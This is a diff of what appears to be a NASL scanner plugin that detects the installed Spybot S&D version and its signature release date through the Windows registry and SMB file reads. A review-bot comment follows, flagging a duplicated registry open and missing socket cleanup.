+ key_h = registry_get_key(soc:soc, uid:uid, tid:tid, pipe:pipe,
+ key:key, reply:handle);
+ if(!key_h)
+ {
+ exit(0);
+ }
+
+ enumKeys = registry_enum_key(soc:soc, uid:uid, tid:tid,
+ pipe:pipe, reply:key_h);
-ver = string(version[0], ".", version[1], ".", version[2], ".", version[3]);
-set_kb_item(name:"SMB/SpybotSD/version", value:ver);
+ foreach entry (enumKeys)
+ {
+ tmp = registry_get_sz(item:"DisplayName", key:key + entry);
+ if("Spybot" >< tmp) {
-# Get release date info about the detection rules (includes.zip)
-fh = CreateFile(
- file:rules,
- desired_access:GENERIC_READ,
- file_attributes:FILE_ATTRIBUTE_NORMAL,
- share_mode:FILE_SHARE_READ,
- create_disposition:OPEN_EXISTING
-);
-if (isnull(fh))
-{
- if (log_verbosity > 1) debug_print("can't open ", rules, "!", level:0);
- NetUseDel();
- exit(0);
-}
+ version = registry_get_sz(item:"DisplayVersion", key:key + entry);
+ if(!isnull(version)) {
+ set_kb_item(name:"SMB/SpybotSD/version", value:version);
+ }
-contents = ReadFile(handle:fh, offset:0, length:85);
-CloseFile(handle:fh);
-if (isnull(contents))
-{
- if (log_verbosity > 1) debug_print("can't read ", rules, "!", level:0);
- NetUseDel();
- exit(0);
-}
-NetUseDel();
+ path = registry_get_sz(item:"InstallLocation", key:key + entry);
+
+ if(path) {
+ path += "Updates";
+ share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:path);
+ path = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:path);
+ file = path + "\downloaded.ini";
+
+ contents = read_file(file:file, share:share, offset:0, count:85);
-sigs_target = strstr(contents, "ReleaseDate=");
-if (strlen(sigs_target) >= 22) sigs_target = substr(sigs_target, 12, 22);
-if (isnull(sigs_target)) sigs_target = "n/a";
+ if(contents && "ReleaseDate" >< contents) {
-if (sigs_target =~ "[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]") {
- a = split(sigs_target, sep:"-", keep:0);
- sigs_target_yyyymmdd = string(a[0], a[1], a[2]);
- sigs_target_mmddyyyy = string(a[1], "/", a[2], "/", a[0]);
-}
-else sigs_target_mmddyyyy = "n/a";
+ sigs_target = strstr(contents, "ReleaseDate=");
+ if (strlen(sigs_target) >= 22) sigs_target = substr(sigs_target, 12, 22);
+ if (isnull(sigs_target)) sigs_target = "n/a";
+ if (sigs_target =~ "[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]") {
+ a = split(sigs_target, sep:"-", keep:0);
+ sigs_target_yyyymmdd = string(a[0], a[1], a[2]);
+ sigs_target_mmddyyyy = string(a[1], "/", a[2], "/", a[0]);
+ }
+ else sigs_target_mmddyyyy = "n/a";
-sigs_vendor_yyyymmdd = "20080924";
-sigs_vendor_mmddyyyy = string(
- substr(sigs_vendor_yyyymmdd, 4, 5),
- "/",
- substr(sigs_vendor_yyyymmdd, 6, 7),
- "/",
- substr(sigs_vendor_yyyymmdd, 0, 3)
-);
+ if(version && sigs_target_mmddyyyy) {
+
+ report = string(
+ desc,
+ "\n\n",
+ "Plugin output :\n\n",
+ "Version : ", version, "\n",
+ "Signatures : ", sigs_target_mmddyyyy);
+
+ if(report_verbosity > 0) {
+ security_note(port:port, data:report);
+ exit(0);
+ }
+ }
+ }
+ }
+ break;
+ }
+ }
-# Generate report.
-report = string(
- desc,
- "\n\n",
- "Plugin output :\n\n",
- " Version : ", ver, "\n",
- " Signatures : ", sigs_target_mmddyyyy
-);
-
-if (sigs_target == "n/a")
-{
- report = string(
- report,
- "\n\n",
- "The remote host has never updated its Spybot S&D detection rule\n",
- "signatures. The latest version is ", sigs_vendor_mmddyyyy, ". As a result, the\n",
- "remote host might contain malware."
- );
- security_hole(port:kb_smb_transport(), data:report);
-}
-else if (sigs_target_yyyymmdd)
-{
- if (int(sigs_target_yyyymmdd) < int(sigs_vendor_yyyymmdd))
- {
- report = string(
- report,
- "\n\n",
- "The remote host has an out-dated version of the Spybot S&D\n",
- "detection rule signatures; the most recent set is ", sigs_vendor_mmddyyyy, ".\n",
- "As a result, the remote host might contain malware."
- );
- security_hole(port:kb_smb_transport(), data:report);
- }
- else security_note(port:kb_smb_transport(), data:report);
-}
+exit(0);
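Review bot: Two cleanup problems in the new registry walk: the `registry_open_hklm` call and its `if(!handle)` check appear twice in a row, and the `if(!key_h)` branch exits without `close(soc)` while every earlier failure branch closes the socket. Drop the second open and use `close(soc); exit(0);` in the `!key_h` branch. The socket is also still open when the script reaches the final `exit(0)`. The `foreach` accepts any uninstall entry whose `DisplayName` contains `Spybot` and stops at the first one, so a short comment stating that this is intended would help the next reader.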